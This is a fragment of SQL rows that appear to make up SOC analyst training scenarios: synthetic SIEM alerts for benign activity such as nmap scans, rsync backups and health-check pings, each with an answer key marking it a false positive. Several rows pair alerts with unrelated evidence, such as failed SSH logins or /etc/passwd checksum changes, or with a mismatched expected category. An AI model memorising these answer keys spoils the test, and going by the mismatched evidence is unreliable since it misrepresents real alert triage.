2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-16T03:02:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-16T03:01:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1812, 'Scheduled Maintenance Activity Mistaken for Persistence Technique', 'low', 'Wazuh', 'Scheduled maintenance scripts were detected as persistence activities due to similarities in script execution patterns.', 'Persistence', 'T1053', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"\",\"username\":\"maintenance_user\",\"hostname\":\"maintenance-server\",\"command_line\":\"/usr/local/bin/maintenance_script.sh\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/local/bin/maintenance_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled maintenance script execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The detected activity is a legitimate scheduled maintenance operation, not a persistence technique.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.335Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"command_line\\\":\\\"/usr/local/bin/maintenance_script.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1813, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A series of network scans were detected originating from a known internal IP range. These scans are part of routine IT security assessments.', 'Network Scan', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:23Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"it_admin\",\"hostname\":\"scan_host\",\"command_line\":\"nmap -sS -p 1-65535 192.168.1.200\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for routine scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS -p 1-65535 192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate network scan command for IT security assessment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scan\",\"analysis_notes\":\"Alert triggered by authorized IT scans. No malicious activity detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.200\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.200\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.200\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.200\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.336Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:15:23Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"scan_host\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.200\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1814, 'Authorized Administrative Backup Processes Detected', 'low', 'Wazuh', 'Backup processes were detected on the server. These are scheduled and authorized administrative tasks.', 'Unauthorized Access', 'T1053', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:40:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"backup_user\",\"hostname\":\"backup_server\",\"command_line\":\"/usr/bin/rsync -av /data /backup\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for scheduled backups\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/rsync -av /data /backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled backup command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_maintenance\",\"analysis_notes\":\"This is a scheduled and authorized backup process. No unauthorized access detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.338Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:40:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"/usr/bin/rsync -av /data /backup\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1815, 'Benign System Health Check Activity', 'low', 'Elastic SIEM', 'System health checks detected on multiple servers. These checks are part of regular monitoring tasks.', 'System Monitoring', 'T1016', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:25:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.15\",\"dst_ip\":\"10.1.1.20\",\"username\":\"monitor_user\",\"hostname\":\"health_check\",\"command_line\":\"ping -c 4 10.1.1.20\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ping -c 4 10.1.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine system health check command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_monitoring\",\"analysis_notes\":\"Routine system health checks detected. No suspicious activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.348Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"10.1.1.20\\\",\\\"username\\\":\\\"monitor_user\\\",\\\"hostname\\\":\\\"health_check\\\",\\\"command_line\\\":\\\"ping -c 4 10.1.1.20\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1816, 'Misconfigured Legacy Application Generating Suspicious Traffic', 'medium', 'Azure Sentinel', 'A legacy application was detected generating potentially suspicious traffic patterns. Investigation revealed it was a misconfiguration.', 'Anomaly Detection', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:34Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"203.0.113.10\",\"username\":\"legacy_app\",\"hostname\":\"legacy_server\",\"command_line\":\"java -jar legacyapp.jar\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"java -jar legacyapp.jar\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Misconfigured application generating unusual traffic\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly_detection\",\"analysis_notes\":\"The traffic was traced back to a misconfigured legacy application. No malicious intent detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.350Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:45:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"java -jar legacyapp.jar\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1817, 'Authorized IT Maintenance Process Triggered Alert', 'low', 'Wazuh', 'An IT maintenance script was executed as part of routine maintenance, triggering an alert due to its network activity.', 'Malware', 'T1087', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:10:55Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.2.15\",\"dst_ip\":\"10.0.2.30\",\"username\":\"maintenance_user\",\"hostname\":\"maintenance_host\",\"command_line\":\"python maintenance_script.py\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used for IT maintenance\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python maintenance_script.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine maintenance script execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_maintenance\",\"analysis_notes\":\"Authorized maintenance process detected. No malicious activity found.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.351Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T15:10:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.2.15\\\",\\\"dst_ip\\\":\\\"10.0.2.30\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance_host\\\",\\\"command_line\\\":\\\"python maintenance_script.py\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
